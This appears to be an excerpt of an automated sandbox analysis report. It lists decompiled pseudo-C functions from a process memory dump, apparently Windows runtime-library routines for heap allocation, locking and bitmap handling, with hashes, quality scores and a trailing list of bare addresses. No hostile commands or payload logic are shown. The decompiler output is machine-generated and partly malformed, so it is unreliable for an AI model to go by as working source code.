                                                                            • Instruction ID: 33017f03d8b12718f5f65c430033a41147c648f0d4641f577e9cc4a64aa7ef38
                                                                            • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                            • Instruction Fuzzy Hash: 4E31C332204205DFC729CF29C481AAAB7E6FFC5314B14C95EE59A8B655DB32F802CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
E010EA70E(intOrPtr* __ecx, char* __edx) {
    unsigned int _v8;
    intOrPtr* _v12;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* _t16;
    intOrPtr _t17;
    intOrPtr _t28;
    char* _t33;
    intOrPtr _t37;
    intOrPtr _t38;
    void* _t50;
    intOrPtr _t52;

    _push(__ecx);
    _push(__ecx);
    _t52 = *0x11a7b10; // 0x9
    _t33 = __edx;
    _t48 = __ecx;
    _v12 = __ecx;
    if(_t52 == 0) {
        *0x11a7b10 = 8;
        *0x11a7b14 = 0x11a7b0c;
        *0x11a7b18 = 1;
        L6:
        _t2 = _t52 + 1; // 0xa
        E010EA990(0x11a7b10, _t2, 7);
        asm("bts ecx, eax");
        *_t48 = _t52;
        *_t33 = 1;
        L3:
        _t16 = 0;
        L4:
        return _t16;
    }
    _t17 = L010EA840(__edx, __ecx, __ecx, _t52, 0x11a7b10, 1, 0);
    if(_t17 == 0xffffffff) {
        _t37 = *0x11a7b10; // 0x9
        _t3 = _t37 + 0x27; // 0x30
        __eflags = _t3 >> 5 - *0x11a7b18; // 0x1
        if(__eflags > 0) {
            _t38 = *0x11a7b9c; // 0x0
            _t4 = _t52 + 0x27; // 0x30
            _v8 = _t4 >> 5;
            _t50 = L010D4620(_t38 + 0xc0000, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
            __eflags = _t50;
            if(_t50 == 0) {
                _t16 = 0xc0000017;
                goto L4;
            }
            *0x11a7b18 = _v8;
            _t8 = _t52 + 7; // 0x10
            E010FF3E0(_t50, *0x11a7b14, _t8 >> 3);
            _t28 = *0x11a7b14; // 0x776f7b0c
            __eflags = _t28 - 0x11a7b0c;
            if(_t28 != 0x11a7b0c) {
                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
            }
            _t9 = _t52 + 8; // 0x11
            *0x11a7b14 = _t50;
            _t48 = _v12;
            *0x11a7b10 = _t9;
            goto L6;
        }
        *0x11a7b10 = _t37 + 8;
        goto L6;
    }
    *__ecx = _t17;
    *_t33 = 0;
    goto L3;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83a89d4619e5d5233c3834b3834c72730bb6c9c72fec8e9897eb04bba6a8ba53
                                                                            • Instruction ID: 26584fc0ee428c2cd3aa8ca308801c813452432c658453b2bee066cccd4cf207
                                                                            • Opcode Fuzzy Hash: 83a89d4619e5d5233c3834b3834c72730bb6c9c72fec8e9897eb04bba6a8ba53
                                                                            • Instruction Fuzzy Hash: EF31BEF1740305DFC729CB09EC84F59BBF9FB88710F944969E2A587284D3729A81CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 97%
E010E61A0(signed int* __ecx) {
    intOrPtr _v8;
    char _v12;
    intOrPtr* _v16;
    intOrPtr _v20;
    intOrPtr _t30;
    intOrPtr _t31;
    void* _t32;
    intOrPtr _t33;
    intOrPtr _t37;
    intOrPtr _t49;
    signed int _t51;
    intOrPtr _t52;
    signed int _t54;
    void* _t59;
    signed int* _t61;
    intOrPtr* _t64;

    _t61 = __ecx;
    _v12 = 0;
    _t30 = *((intOrPtr*)(*[fs:0x30] + 0x1e8));
    _v16 = __ecx;
    _v8 = 0;
    if(_t30 == 0) {
        L6:
        _t31 = 0;
        L7:
        return _t31;
    }
    _t32 = _t30 + 0x5d8;
    if(_t32 == 0) {
        goto L6;
    }
    _t59 = _t32 + 0x30;
    if(*((intOrPtr*)(_t32 + 0x30)) == 0) {
        goto L6;
    }
    if(__ecx != 0) {
        *((intOrPtr*)(__ecx)) = 0;
        *((intOrPtr*)(__ecx + 4)) = 0;
    }
    if(*((intOrPtr*)(_t32 + 0xc)) != 0) {
        _t51 = *(_t32 + 0x10);
        _t33 = _t32 + 0x10;
        _v20 = _t33;
        _t54 = *(_t33 + 4);
        if((_t51 | _t54) == 0) {
            _t37 = E010E5E50(0x10967cc, 0, 0, &_v12);
            if(_t37 != 0) {
                goto L6;
            }
            _t52 = _v8;
            asm("lock cmpxchg8b [esi]");
            _t64 = _v16;
            _t49 = _t37;
            _v20 = 0;
            if(_t37 == 0) {
                if(_t64 != 0) {
                    *_t64 = _v12;
                    *((intOrPtr*)(_t64 + 4)) = _t52;
                }
                E01189D2E(_t59, 0, _v12, _v8, *(*((intOrPtr*)(*[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff, *((intOrPtr*)(*((intOrPtr*)(*[fs:0x30] + 0x10)) + 0x3c)));
                _t31 = 1;
                goto L7;
            }
            E010BF7C0(_t52, _v12, _t52, 0);
            if(_t64 != 0) {
                *_t64 = _t49;
                *((intOrPtr*)(_t64 + 4)) = _v20;
            }
            L12:
            _t31 = 1;
            goto L7;
        }
        if(_t61 != 0) {
            *_t61 = _t51;
            _t61[1] = _t54;
        }
        goto L12;
    } else {
        goto L6;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d04c5a56652f960dec7ae9c4cb63d3fed126897391a496f3199f6f07f511b58
                                                                            • Instruction ID: dfd8dccf45f8870830d96e319c0d6f98bd2e27c72aeb7b84f8bd043c257c4564
                                                                            • Opcode Fuzzy Hash: 5d04c5a56652f960dec7ae9c4cb63d3fed126897391a496f3199f6f07f511b58
                                                                            • Instruction Fuzzy Hash: C7316D716057118FE364CF1ED844B2ABBE5FFA8B00F0549ADE99497391E771D804CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
E010BAA16(signed short* __ecx) {
    signed int _v8;
    intOrPtr _v12;
    signed short _v16;
    intOrPtr _v20;
    signed short _v24;
    signed short _v28;
    void* _v32;
    void* __ebx;
    void* __edi;
    void* __esi;
    intOrPtr _t25;
    signed short _t38;
    signed short* _t42;
    signed int _t44;
    signed short* _t52;
    signed short _t53;
    signed int _t54;

    _v8 = *0x11ad360 ^ _t54;
    _t42 = __ecx;
    _t44 = *__ecx & 0x0000ffff;
    _t52 = &(__ecx[2]);
    _t51 = _t44 + 2;
    if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
        L4:
        _t25 = *0x11a7b9c; // 0x0
        _t53 = L010D4620(_t44, *((intOrPtr*)(*[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
        __eflags = _t53;
        if(_t53 == 0) {
            L3:
            return E010FB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
        } else {
            E010FF3E0(_t53, *_t52, *_t42 & 0x0000ffff);
            *((short*)(_t53 + ((*_t42 & 0x0000ffff) >> 1) * 2)) = 0;
            L2:
            _t51 = 4;
            if(L010C6C59(_t53, _t51, _t58) != 0) {
                _t28 = E010E5E50(0x109c338, 0, 0, &_v32);
                __eflags = _t28;
                if(_t28 == 0) {
                    _t38 = (*_t42 & 0x0000ffff) + 2;
                    __eflags = _t38;
                    _v24 = _t53;
                    _v16 = _t38;
                    _v20 = 0;
                    _v12 = 0;
                    E010EB230(_v32, _v28, 0x109c2d8, 1, &_v24);
                    _t28 = E010BF7A0(_v32, _v28);
                }
                __eflags = _t53 - *_t52;
                if(_t53 != *_t52) {
                    _t28 = L010D77F0(*((intOrPtr*)(*[fs:0x30] + 0x18)), 0, _t53);
                }
            }
            goto L3;
        }
    }
    _t53 = *_t52;
    _t44 = _t44 >> 1;
    _t58 = *((intOrPtr*)(_t53 + _t44 * 2));
    if(*((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
        goto L4;
    }
    goto L2;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ebeaf092fd417aad5feecb0e49f9af3b4e6492efc904126bea3a7188ce7fbca
                                                                            • Instruction ID: cc7f962890e1d68249187e95d068d9a337e25eeab8863ed0db66463df5dcb0ab
                                                                            • Opcode Fuzzy Hash: 5ebeaf092fd417aad5feecb0e49f9af3b4e6492efc904126bea3a7188ce7fbca
                                                                            • Instruction Fuzzy Hash: E131E372A0021AEBDF159F68CD81ABFB7B8FF04700B414469F941EB640E7749910DBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
E010F4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
    signed int _v8;
    signed int* _v12;
    char _v13;
    signed int _v16;
    char _v21;
    signed int* _v24;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t29;
    signed int* _t32;
    signed int* _t41;
    signed int _t42;
    void* _t43;
    intOrPtr* _t51;
    void* _t52;
    signed int _t53;
    signed int _t58;
    void* _t59;
    signed int _t60;
    signed int _t62;

    _t49 = __edx;
    _t62 = (_t60 & 0xfffffff8) - 0xc;
    _t26 = *0x11ad360 ^ _t62;
    _v8 = *0x11ad360 ^ _t62;
    _t41 = __ecx;
    _t51 = __edx;
    _v12 = __ecx;
    if(_a4 == 0) {
        if(_a8 != 0) {
            goto L1;
        }
        _v13 = 1;
        E010D2280(_t26, 0x11a8608);
        _t58 = *_t41;
        if(_t58 == 0) {
            L11:
            E010CFFB0(_t41, _t51, 0x11a8608);
            L2:
            *0x11ab1e0(_a4, _a8);
            _t42 = *_t51();
            if(_t42 == 0) {
                _t29 = 0;
                L5:
                _pop(_t52);
                _pop(_t59);
                _pop(_t43);
                return E010FB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
            }
            *((intOrPtr*)(_t42 + 0x34)) = 1;
            if(_v21 != 0) {
                _t53 = 0;
                E010D2280(_t28, 0x11a8608);
                _t32 = _v24;
                if(*_t32 == _t58) {
                    *_t32 = _t42;
                    *((intOrPtr*)(_t42 + 0x34)) = *((intOrPtr*)(_t42 + 0x34)) + 1;
                    if(_t58 != 0) {
                        *(_t58 + 0x34) = *(_t58 + 0x34) - 1;
                        asm("sbb edi, edi");
                        _t53 = !(~(*(_t58 + 0x34))) & _t58;
                    }
                }
                E010CFFB0(_t42, _t53, 0x11a8608);
                if(_t53 != 0) {
                    L010D77F0(*((intOrPtr*)(*[fs:0x30] + 0x18)), 0, _t53);
                }
            }
            _t29 = _t42;
            goto L5;
        }
        if(*((char*)(_t58 + 0x40)) != 0) {
            L10:
            *(_t58 + 0x34) = *(_t58 + 0x34) + 1;
            E010CFFB0(_t41, _t51, 0x11a8608);
            _t29 = _t58;
            goto L5;
        }
        _t49 = *((intOrPtr*)(*[fs:0x30] + 0x10));
        if(*((intOrPtr*)(_t58 + 0x38)) != *((intOrPtr*)(*((intOrPtr*)(*[fs:0x30] + 0x10)) + 0x294))) {
            goto L11;
        }
        goto L10;
    }
    L1:
    _v13 = 0;
    _t58 = 0;
    goto L2;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: adf2d9a994e97a8dad664a5b690e4be3127edb96b730e4b150e5fe5038252300
                                                                            • Instruction ID: 1e0f5306be53ee03f261e7c5d359428afcfa55efe1e02342ff53789df598d9db
                                                                            • Opcode Fuzzy Hash: adf2d9a994e97a8dad664a5b690e4be3127edb96b730e4b150e5fe5038252300
                                                                            • Instruction Fuzzy Hash: 403124322057529BD761DF18C942B2BBBF5FF81B10F44446DEA9687A41C770D849CB86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E010F8EC7(void* __ecx, void* __edx) {
    signed int _v8;
    intOrPtr _v16;
    intOrPtr _v20;
    intOrPtr _v24;
    char* _v28;
    intOrPtr _v32;
    intOrPtr _v36;
    intOrPtr _v40;
    signed int* _v44;
    intOrPtr _v48;
    intOrPtr _v52;
    intOrPtr _v56;
    signed int* _v60;
    intOrPtr _v64;
    intOrPtr _v68;
    intOrPtr _v72;
    char* _v76;
    intOrPtr _v80;
    signed int _v84;
    intOrPtr _v88;
    intOrPtr _v92;
    intOrPtr _v96;
    intOrPtr _v100;
    intOrPtr _v104;
    signed int* _v108;
    char _v140;
    signed int _v144;
    signed int _v148;
    intOrPtr _v152;
    char _v156;
    intOrPtr _v160;
    char _v164;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* _t67;
    intOrPtr _t70;
    void* _t71;
    void* _t72;
    signed int _t73;

    _t69 = __edx;
    _v8 = *0x11ad360 ^ _t73;
    _t48 = *[fs:0x30];
    _t72 = __edx;
    _t71 = __ecx;
    if(*((intOrPtr*)(*[fs:0x30] + 0x18)) != 0) {
        _t48 = E010E4E70(0x11a86e4, 0x10f9490, 0, 0);
        if(*0x11a53e8 > 5 && E010F8F33(0x11a53e8, 0, 0x2000) != 0) {
            _v156 = *((intOrPtr*)(_t71 + 0x44));
            _v144 = *(_t72 + 0x44) & 0x0000ffff;
            _v148 = *(_t72 + 0x46) & 0x0000ffff;
            _v164 = *((intOrPtr*)(_t72 + 0x58));
            _v108 = &_v84;
            _v92 = *((intOrPtr*)(_t71 + 0x28));
            _v84 = *(_t71 + 0x24) & 0x0000ffff;
            _v76 = &_v156;
            _t70 = 8;
            _v60 = &_v144;
            _t67 = 4;
            _v44 = &_v148;
            _v152 = 0;
            _v160 = 0;
            _v104 = 0;
            _v100 = 2;
            _v96 = 0;
            _v88 = 0;
            _v80 = 0;
            _v72 = 0;
            _v68 = _t70;
            _v64 = 0;
            _v56 = 0;
            _v52 = 0x11a53e8;
            _v48 = 0;
            _v40 = 0;
            _v36 = 0x11a53e8;
            _v32 = 0;
            _v28 = &_v164;
            _v24 = 0;
            _v20 = _t70;
            _v16 = 0;
            _t69 = 0x109bc46;
            _t48 = E01137B9C(0x11a53e8, 0x109bc46, _t67, 0x11a53e8, _t70, &_v140);
        }
    }
    return E010FB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
}

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 409a039f163663610ba6795e4ee04c186d28f2eb08f697cfa6d8fe975031f775
                                                                            • Instruction ID: fd6434a45705d803bceab30ac94cbbfaa070d72fdf2068dd1a8da72d871c164c
                                                                            • Opcode Fuzzy Hash: 409a039f163663610ba6795e4ee04c186d28f2eb08f697cfa6d8fe975031f775
                                                                            • Instruction Fuzzy Hash: AD4190B1D04218AEDB24CFAAD981AEDFBF5FB48310F5081AEE649A7640D7705A84CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                                                                                  E010EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) { 				intOrPtr* _v0; 				signed char _v4; 				signed int _v8; 				void* __ecx; 				void* __ebp; 				void* _t37; 				intOrPtr _t38; 				signed int _t44; 				signed char _t52; 				void* _t54; 				intOrPtr* _t56; 				void* _t58; 				char* _t59; 				signed int _t62;  				_t58 = __edx; 				_push(0); 				_push(4); 				_push( &_v8); 				_push(0x24); 				_push(0xffffffff); 				if(E010F9670() < 0) { 					L0110DF30(_t54, _t58, _t35); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					asm("int3"); 					_push(_t54); 					_t52 = _v4; 					if(_t52 > 8) { 						_t37 = 0xc0000078; 					} else { 						_t38 =  *0x11a7b9c; // 0x0 						_t62 = _t52 & 0x000000ff; 						_t59 = L010D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4); 						if(_t59 == 0) { 							_t37 = 0xc0000017; 						} else { 							_t56 = _v0; 							 *(_t59 + 1) = _t52; 							 *_t59 = 1; 							 *((intOrPtr*)(_t59 + 2)) =  *_t56; 							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4)); 							_t44 = _t62 - 1; 							if(_t44 <= 7) { 								switch( *((intOrPtr*)(_t44 * 4 +  &M010EE810))) { 									case 0: 										L6: 										 *((intOrPtr*)(_t59 + 8)) = _a8; 										goto L7; 									case 1: 										L13: 										 *((intOrPtr*)(__edx + 0xc)) = _a12; 										goto L6; 									case 2: 										L12: 										 *((intOrPtr*)(__edx + 0x10)) = _a16; 										goto L13; 									case 3: 										L11: 										 *((intOrPtr*)(__edx + 0x14)) = _a20; 										goto L12; 									case 4: 										L10: 										 *((intOrPtr*)(__edx + 0x18)) = _a24; 										goto L11; 									case 5: 										L9: 										 *((intOrPtr*)(__edx + 
0x1c)) = _a28; 										goto L10; 									case 6: 										L17: 										 *((intOrPtr*)(__edx + 0x20)) = _a32; 										goto L9; 									case 7: 										 *((intOrPtr*)(__edx + 0x24)) = _a36; 										goto L17; 								} 							} 							L7: 							 *_a40 = _t59; 							_t37 = 0; 						} 					} 					return _t37; 				} else { 					_push(0x20); 					asm("ror eax, cl"); 					return _a4 ^ _v8; 				} 			}                        

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 975f0e96a73cc593577bb7a40c19b535f02e817af5bb587ce21a71904ade01c8
                                                                            • Instruction ID: d352a8efe966268b05606ce44eac71e39c27b4a459eb3ff3ffb0197196a735d3
                                                                            • Opcode Fuzzy Hash: 975f0e96a73cc593577bb7a40c19b535f02e817af5bb587ce21a71904ade01c8
                                                                            • Instruction Fuzzy Hash: A631BD75A44209EFD744CF59C845B8ABBE4FB09314F1482AAFA88CB341D631EC80CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E010EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) { 				intOrPtr _v8; 				intOrPtr _v12; 				void* __ebx; 				void* __edi; 				intOrPtr _t22; 				intOrPtr* _t41; 				intOrPtr _t51;  				_t51 =  *0x11a6100; // 0x1a 				_v12 = __edx; 				_v8 = __ecx; 				if(_t51 >= 0x800) { 					L12: 					return 0; 				} else { 					goto L1; 				} 				while(1) { 					L1: 					_t22 = _t51; 					asm("lock cmpxchg [ecx], edx"); 					if(_t51 == _t22) { 						break; 					} 					_t51 = _t22; 					if(_t22 < 0x800) { 						continue; 					} 					goto L12; 				} 				E010D2280(0xd, 0x583f1a0); 				_t41 =  *0x11a60f8; // 0x0 				if(_t41 != 0) { 					 *0x11a60f8 =  *_t41; 					 *0x11a60fc =  *0x11a60fc + 0xffff; 				} 				E010CFFB0(_t41, 0x800, 0x583f1a0); 				if(_t41 != 0) { 					L6: 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					 *((intOrPtr*)(_t41 + 0x1c)) = _v12; 					 *((intOrPtr*)(_t41 + 0x20)) = _a4; 					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff; 					do { 						asm("lock xadd [0x11a60f0], ax"); 						 *((short*)(_t41 + 0x34)) = 1; 					} while (1 == 0); 					goto L8; 				} else { 					_t41 = L010D4620(0x11a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0); 					if(_t41 == 0) { 						L11: 						asm("lock dec dword [0x11a6100]"); 						L8: 						return _t41; 					} 					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000; 					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000; 					if(_t41 == 0) { 						goto L11; 					} 					goto L6; 				} 			}                        

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db501d3a408fbc9a65a67d47c072a809e33c6d89b4f85a4336ff67c216110aa1
                                                                            • Instruction ID: 029816e14210fb2031dee16d8269c020b0314c345ca347f82f0b0e3738396e12
                                                                            • Opcode Fuzzy Hash: db501d3a408fbc9a65a67d47c072a809e33c6d89b4f85a4336ff67c216110aa1
                                                                            • Instruction Fuzzy Hash: 913131326046069FCB21EF59C4807AA7BF4FF18310F490078ED95DB205E731D985CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                                                                                  E010B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) { 				signed int _t53; 				signed int _t56; 				signed int* _t60; 				signed int _t63; 				signed int _t66; 				signed int _t69; 				void* _t70; 				intOrPtr* _t72; 				void* _t78; 				void* _t79; 				signed int _t80; 				intOrPtr _t82; 				void* _t85; 				void* _t88; 				void* _t89;  				_t84 = __esi; 				_t70 = __ecx; 				_t68 = __ebx; 				_push(0x2c); 				_push(0x118f6e8); 				E0110D0E8(__ebx, __edi, __esi); 				 *((char*)(_t85 - 0x1d)) = 0; 				_t82 =  *((intOrPtr*)(_t85 + 8)); 				if(_t82 == 0) { 					L4: 					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) { 						E011888F5(_t68, _t70, _t78, _t82, _t84, __eflags); 					} 					L5: 					return E0110D130(_t68, _t82, _t84); 				} 				_t88 = _t82 -  *0x11a86c0; // 0x5e07b0 				if(_t88 == 0) { 					goto L4; 				} 				_t89 = _t82 -  *0x11a86b8; // 0x0 				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { 					goto L4; 				} else { 					E010D2280(_t82 + 0xe0, _t82 + 0xe0); 					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000; 					__eflags =  *((char*)(_t82 + 0xe5)); 					if(__eflags != 0) { 						E011888F5(__ebx, _t70, _t78, _t82, __esi, __eflags); 						goto L12; 					} else { 						__eflags =  *((char*)(_t82 + 0xe4)); 						if( *((char*)(_t82 + 0xe4)) == 0) { 							 *((char*)(_t82 + 0xe4)) = 1; 							_push(_t82); 							_push( *((intOrPtr*)(_t82 + 0x24))); 							E010FAFD0(); 						} 						while(1) { 							_t60 = _t82 + 8; 							 *(_t85 - 0x2c) = _t60; 							_t68 =  *_t60; 							_t80 = _t60[1]; 							 *(_t85 - 0x28) = _t68; 							 *(_t85 - 0x24) = _t80; 							while(1) { 								L10: 								__eflags = _t80; 								if(_t80 == 0) { 									break; 								} 								_t84 = _t68; 								 *(_t85 - 0x30) = _t80; 								 *(_t85 - 0x24) = _t80 - 1; 								
asm("lock cmpxchg8b [edi]"); 								_t68 = _t84; 								 *(_t85 - 0x28) = _t68; 								 *(_t85 - 0x24) = _t80; 								__eflags = _t68 - _t84; 								_t82 =  *((intOrPtr*)(_t85 + 8)); 								if(_t68 != _t84) { 									continue; 								} 								__eflags = _t80 -  *(_t85 - 0x30); 								if(_t80 !=  *(_t85 - 0x30)) { 									continue; 								} 								__eflags = _t80; 								if(_t80 == 0) { 									break; 								} 								_t63 = 0; 								 *(_t85 - 0x34) = 0; 								_t84 = 0; 								__eflags = 0; 								while(1) { 									 *(_t85 - 0x3c) = _t84; 									__eflags = _t84 - 3; 									if(_t84 >= 3) { 										break; 									} 									__eflags = _t63; 									if(_t63 != 0) { 										L40: 										_t84 =  *_t63; 										__eflags = _t84; 										if(_t84 != 0) { 											_t84 =  *(_t84 + 4); 											__eflags = _t84; 											if(_t84 != 0) { 												 *0x11ab1e0(_t63, _t82); 												 *_t84(); 											} 										} 										do { 											_t60 = _t82 + 8; 											 *(_t85 - 0x2c) = _t60; 											_t68 =  *_t60; 											_t80 = _t60[1]; 											 *(_t85 - 0x28) = _t68; 											 *(_t85 - 0x24) = _t80; 											goto L10; 										} while (_t63 == 0); 										goto L40; 									} 									_t69 = 0; 									__eflags = 0; 									while(1) { 										 *(_t85 - 0x38) = _t69; 										__eflags = _t69 -  *0x11a84c0; 										if(_t69 >=  *0x11a84c0) { 											break; 										} 										__eflags = _t63; 										if(_t63 != 0) { 											break; 										} 										_t66 = E01189063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82); 										__eflags = _t66; 										if(_t66 == 0) { 											_t63 = 0; 											__eflags = 0; 										} else { 											_t63 = _t66 + 0xfffffff4; 										} 										 *(_t85 - 0x34) = _t63; 										_t69 = _t69 + 1; 									} 									_t84 = _t84 + 1; 								} 								__eflags = _t63; 							} 							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 
4)); 							 *((char*)(_t82 + 0xe5)) = 1; 							 *((char*)(_t85 - 0x1d)) = 1; 							L12: 							 *(_t85 - 4) = 0xfffffffe; 							E010B922A(_t82); 							_t53 = E010D7D50(); 							__eflags = _t53; 							if(_t53 != 0) { 								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; 							} else { 								_t56 = 0x7ffe0386; 							} 							__eflags =  *_t56; 							if( *_t56 != 0) { 								_t56 = E01188B58(_t82); 							} 							__eflags =  *((char*)(_t85 - 0x1d)); 							if( *((char*)(_t85 - 0x1d)) != 0) { 								__eflags = _t82 -  *0x11a86c0; // 0x5e07b0 								if(__eflags != 0) { 									__eflags = _t82 -  *0x11a86b8; // 0x0 									if(__eflags == 0) { 										_t79 = 0x11a86bc; 										_t72 = 0x11a86b8; 										goto L18; 									} 									__eflags = _t56 | 0xffffffff; 									asm("lock xadd [edi], eax"); 									if(__eflags == 0) { 										E010B9240(_t68, _t82, _t82, _t84, __eflags); 									} 								} else { 									_t79 = 0x11a86c4; 									_t72 = 0x11a86c0; 									L18: 									E010E9B82(_t68, _t72, _t79, _t82, _t84, __eflags); 								} 							} 							goto L5; 						} 					} 				} 			}                        

                                                                            0x0111373d
                                                                            0x01113740
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01113746
                                                                            0x01113749
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0111374f
                                                                            0x01113751
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01113757
                                                                            0x01113759
                                                                            0x0111375c
                                                                            0x0111375c
                                                                            0x0111375e
                                                                            0x0111375e
                                                                            0x01113761
                                                                            0x01113764
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01113766
                                                                            0x01113768
                                                                            0x011137a3
                                                                            0x011137a3
                                                                            0x011137a5
                                                                            0x011137a7
                                                                            0x011137ad
                                                                            0x011137b0
                                                                            0x011137b2
                                                                            0x011137bc
                                                                            0x011137c2
                                                                            0x011137c2
                                                                            0x011137b2
                                                                            0x010b9187
                                                                            0x010b9187
                                                                            0x010b918a
                                                                            0x010b918d
                                                                            0x010b918f
                                                                            0x010b9192
                                                                            0x010b9195
                                                                            0x00000000
                                                                            0x010b9195
                                                                            0x00000000
                                                                            0x010b9187
                                                                            0x0111376a
                                                                            0x0111376a
                                                                            0x0111376c
                                                                            0x0111376c
                                                                            0x0111376f
                                                                            0x01113775
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01113777
                                                                            0x01113779
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01113782
                                                                            0x01113787
                                                                            0x01113789
                                                                            0x01113790
                                                                            0x01113790
                                                                            0x0111378b
                                                                            0x0111378b
                                                                            0x0111378b
                                                                            0x01113792
                                                                            0x01113795
                                                                            0x01113795
                                                                            0x01113798
